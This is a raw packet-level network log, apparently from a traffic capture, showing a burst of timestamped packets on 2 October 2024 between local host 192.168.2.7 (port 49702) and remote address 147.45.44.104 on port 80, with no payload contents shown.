                                                                                                            Oct 2, 2024 08:54:59.129642963 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.129692078 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.129718065 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.129734039 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.129767895 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.130146980 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.130192041 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.130325079 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.130341053 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.130386114 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.226671934 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.226756096 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.226771116 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.226900101 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.227121115 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.227137089 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.227150917 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.227165937 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.227170944 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.227209091 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.227884054 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.227899075 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.227912903 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.227927923 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.227943897 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.227952957 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.227952957 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.227983952 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.228936911 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.228954077 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.229043961 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.229362965 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.229377985 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.229393005 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.229490995 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.230011940 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.230026960 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.230041981 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.230057955 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.230063915 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.230073929 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.230093002 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.230134964 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.230962038 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.230978966 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.231000900 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.231015921 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.231030941 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.231038094 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.231087923 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.232249975 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.232264996 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.232287884 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.232300997 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.232302904 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.232320070 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.232336044 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.232357979 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.232357979 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.233479023 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.233495951 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.233509064 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.233525991 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.233576059 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.307730913 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.307770014 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.307785988 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.307809114 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.308121920 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.308514118 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.313245058 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.313304901 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.313366890 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.313406944 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.313616037 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.313632011 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.313647032 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.313690901 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.313690901 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.314162016 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.314327002 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.314505100 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.314549923 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.314565897 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.314580917 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.314608097 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.315120935 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.315208912 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.315323114 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.315339088 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.315355062 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.315371037 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.315407991 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.315407991 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.316224098 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.316241026 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.316257000 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.316273928 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.316313982 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.316313982 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.316952944 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.316967964 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.316982985 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.316999912 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.317023993 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.317111969 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.317584038 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.317599058 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.317614079 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.317631006 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.317656994 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.317812920 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.318240881 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.318257093 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.318272114 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.318286896 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.318303108 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.318326950 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.318326950 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.319101095 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.319116116 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.319130898 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.319144964 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.319152117 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.319161892 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.319178104 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.319205999 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.319205999 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.320024014 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.320039988 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.320055008 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.320070982 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.320085049 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.320091963 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.320128918 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.320128918 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.320837021 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.320851088 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.320866108 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.321013927 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.394474030 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.394639969 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.394654989 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.394710064 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.394881010 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.394897938 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.395013094 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.395175934 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.395191908 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.395236969 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.395478010 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.395937920 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.400016069 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.400158882 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.400172949 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.400212049 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.400319099 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.400336027 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.400413990 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.400588989 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.400716066 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.400732040 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.400754929 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.400845051 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.400933027 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.400958061 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.400995970 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.401262045 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.401278019 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.401294947 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.401329041 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.401637077 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.401652098 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.401669979 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.401694059 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.401741028 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.402084112 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.402098894 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.402115107 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.402129889 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.402146101 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.402160883 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.402168989 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.402168989 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.402239084 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.402987957 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.403004885 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.403018951 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.403036118 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.403049946 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.403065920 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.403074026 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.403074026 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.403084993 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.403140068 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.403898954 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.403914928 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.403929949 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.403945923 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.403961897 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.403970957 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.403970957 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.403978109 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.403994083 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.404040098 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.404040098 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.404787064 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.404819965 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.404834032 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.404850006 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.404865980 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.404882908 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.404887915 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.404887915 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.404932976 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.405664921 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.405682087 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.405695915 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.405711889 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.405725956 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.405741930 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.405756950 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.405770063 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.405770063 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.405833006 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.406588078 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.406601906 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.406619072 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.406632900 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.406646967 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.406658888 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.406658888 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.406665087 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.406719923 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.407480955 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.407496929 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.407511950 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.407527924 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.407546043 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.407555103 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.407555103 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.407562017 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.407578945 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.407613993 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.407613993 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.408410072 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.408427000 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.408442020 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.408457041 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.408473015 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.408488035 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.408497095 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.408497095 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.408503056 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.408564091 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.409307957 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.409324884 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.409339905 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.409354925 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.409370899 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.409374952 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.409374952 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.409385920 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.409485102 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.410201073 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.410218000 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.410233021 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.410248995 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.410264015 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.410279989 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.410280943 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.410280943 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.410296917 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.410342932 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.410342932 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.411102057 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.411118031 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.411133051 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.411149025 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.411164045 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.411179066 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.411185026 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.411185026 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.411194086 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.411227942 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.411947966 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.411962986 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.411977053 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.412022114 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.412022114 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.481313944 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.481364012 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.481374979 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.481470108 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.481647015 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.481661081 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.481687069 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.481697083 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.481698990 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.481729984 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.482083082 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.482094049 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.482104063 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.482115030 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.482122898 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.482124090 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.482148886 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.482244968 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.488076925 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.488145113 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.488200903 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.488271952 CEST4970280192.168.2.7147.45.44.104
